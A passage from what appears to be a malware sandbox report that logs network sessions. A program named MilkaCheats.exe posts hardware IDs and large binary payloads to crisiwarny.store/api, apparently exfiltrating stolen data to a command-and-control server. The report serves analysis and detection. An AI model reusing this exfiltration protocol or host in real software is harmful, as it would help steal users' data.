                                                                                            2024-10-27 15:45:01 UTC1369INData Raw: 49 72 58 4a 68 79 49 70 52 47 62 41 6d 6f 62 58 54 39 73 6a 34 47 48 66 77 71 33 63 46 71 52 74 42 4f 52 67 6f 55 38 4e 4e 53 58 32 68 68 6a 55 73 4d 75 68 5a 48 48 71 59 6a 47 4f 58 78 4b 33 67 31 69 32 4f 4a 6e 32 68 79 6b 77 41 46 44 56 6d 69 32 52 51 45 50 6b 2f 59 63 69 4b 55 52 6d 77 4a 71 47 31 70 39 37 73 6b 4c 53 44 62 50 4f 54 76 42 58 4c 55 53 45 59 49 66 34 71 4a 49 78 45 72 54 4a 46 4c 58 50 63 55 63 31 6e 7a 62 33 58 6f 75 43 49 37 59 65 34 42 6d 4f 41 2b 59 39 4e 57 51 67 70 46 2f 74 4a 53 45 57 67 55 7a 41 4a 63 71 78 51 7a 57 65 77 68 56 66 75 38 50 44 73 78 32 54 33 5a 78 79 73 6e 37 57 5a 71 51 56 75 67 78 67 4d 4b 4c 46 71 68 63 6a 75 2f 55 57 77 6e 6c 52 68 4a 2f 61 39 77 48 69 44 64 4f 4a 71 66 61 48 69 54 41 41 56 74 58 4c 58 4d 55
                                                                                            Data Ascii: IrXJhyIpRGbAmobXT9sj4GHfwq3cFqRtBORgoU8NNSX2hhjUsMuhZHHqYjGOXxK3g1i2OJn2hykwAFDVmi2RQEPk/YciKURmwJqG1p97skLSDbPOTvBXLUSEYIf4qJIxErTJFLXPcUc1nzb3XouCI7Ye4BmOA+Y9NWQgpF/tJSEWgUzAJcqxQzWewhVfu8PDsx2T3Zxysn7WZqQVugxgMKLFqhcju/UWwnlRhJ/a9wHiDdOJqfaHiTAAVtXLXMU


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.449736172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:02 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18168
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:02 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:02 UTC2837OUTData Raw: bb b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33
                                                                                            Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                                                                                            2024-10-27 15:45:03 UTC1015INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:03 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=prl49i7846bu8g5ql22ahpsot9; expires=Thu, 20 Feb 2025 09:31:41 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CsZiINoUXwc6wjOVCB%2B3nnI0qmoa4cgjZSCkBy59%2FikOKpBkK4L0Y%2F0BrwsIET2J6frSe%2BYcwnASZwtait5yzsC9h%2B987FumQpMD30kDJKNM00EPT7sFjfy8iS2U86wjxKXA"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf97286ee96a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2375&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19130&delivery_rate=1289977&cwnd=250&unsent_bytes=0&cid=41561136401a2d35&ts=697&x=0"
                                                                                            2024-10-27 15:45:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449738172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:03 UTC281OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8789
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:03 UTC8789OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:05 UTC1008INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=s6l77sqnnnj78oqbp6gj1ljnm9; expires=Thu, 20 Feb 2025 09:31:44 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B1sfBoA%2FIwYWiKwseGbEoaHRPaFN1VDkOgiX1NC642jdPYtbGiTZxwe4ESkoaPN1vVriSJZ6fbrzNUQr157MS8YwiRxOi9etNv5XU3Qdm9EXaY2gIFSJTw0vz3kGJ7vDw94F"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cf9fdd1c6c52-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1196&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9728&delivery_rate=2627949&cwnd=251&unsent_bytes=0&cid=9e7de4b13eb59359&ts=1635&x=0"
                                                                                            2024-10-27 15:45:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449740172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:06 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20442
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:06 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:06 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                            Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                                            2024-10-27 15:45:07 UTC1014INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ectbll4ot2ru7gni9r84og0f01; expires=Thu, 20 Feb 2025 09:31:46 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BH%2BdvKLzMwvAkvvC3OpPls8bbAF%2FzI5BBvwFRop4XRwl2y4GR2XWbc7fbHKsISXeF9hbkThiQM8OoeTDsXr3oyg7VtQbFDo%2F4OZxZJni%2FNuL3fWZBsNdmokOkrNLr2O4A0XM"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfafaa32e873-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1282&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21404&delivery_rate=2192278&cwnd=251&unsent_bytes=0&cid=92d612d9f43344e2&ts=1036&x=0"
                                                                                            2024-10-27 15:45:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449741172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:09 UTC281OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1288
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:09 UTC1288OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:09 UTC1014INHTTP/1.1 200 OK
                                                                                            Date: Sun, 27 Oct 2024 15:45:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=if7clolk2ttlqr2u9tgkbh9oq6; expires=Thu, 20 Feb 2025 09:31:48 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qnFcuEjMxUCr3Jw8VxWY%2F6aqddWohuNpDSx8%2BeIjtmr2bBk6%2BWbPCz6%2FGLJpdAF%2FaFFYYr4qDKKXUUPv9X7VyK0qY9MvoJrokcN3GFDgeUc4ROYUXB1Pv4Lh%2FtQrt8ixcdKr"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8d93cfc02d51e528-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2205&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=e0659a23e88d9f94&ts=555&x=0"
                                                                                            2024-10-27 15:45:09 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a
                                                                                            Data Ascii: 11ok 173.254.250.90
                                                                                            2024-10-27 15:45:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449743172.67.170.644436428C:\Users\user\Desktop\MilkaCheats.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-27 15:45:10 UTC283OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 584404
                                                                                            Host: crisiwarny.store
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 43 31 46 31 41 41 36 34 39 36 31 31 37 32 36 33 45 34 36 44 43 44 38 35 30 30 39 41 35 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 35 37 34 33
                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E2C1F1AA6496117263E46DCD85009A54--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"yau6Na--55743
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: 5b 36 f6 3d 6b 58 2c 3c 16 18 a1 c2 87 b8 49 14 9e 04 cd 16 ca 52 a3 cf 29 52 ce 97 b1 7f 62 ec 50 7e f3 3f be 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96
                                                                                            Data Ascii: [6=kX,<IR)RbP~?jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: d4 8a 8d 33 62 59 df 43 5c 93 00 df c6 f2 15 4f 88 cc 01 0a 93 00 b9 99 c0 1e 28 cf d9 e1 27 0f 54 31 8d 5b b1 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd
                                                                                            Data Ascii: 3bYC\O('T1[DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: 92 6c 98 c2 f3 3d 30 40 90 52 a1 26 50 2c d4 2c 1a db 50 77 05 65 a0 8a 5c 5e 1f d2 87 0c 5f 77 97 4e 1c 30 8c 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3
                                                                                            Data Ascii: l=0@R&P,,Pwe\^_wN0 E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry<A9
                                                                                            2024-10-27 15:45:10 UTC15331OUTData Raw: b0 18 28 a9 f1 10 e4 1c c8 15 ae d7 01 5e 6a f5 b3 9c 0b 5b 29 07 11 3a 54 9b 7a 15 30 fa 5b 3d 98 5e 20 b5 be e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69
                                                                                            Data Ascii: (^j[):Tz0[=^ N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai
